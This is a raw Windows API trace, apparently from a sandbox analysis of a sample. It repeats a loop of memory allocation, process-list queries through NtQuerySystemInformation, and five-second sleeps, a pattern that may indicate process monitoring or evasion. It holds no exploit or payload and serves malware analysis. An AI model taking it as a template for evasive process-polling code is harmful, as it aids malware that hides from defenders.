[0242.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.457] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 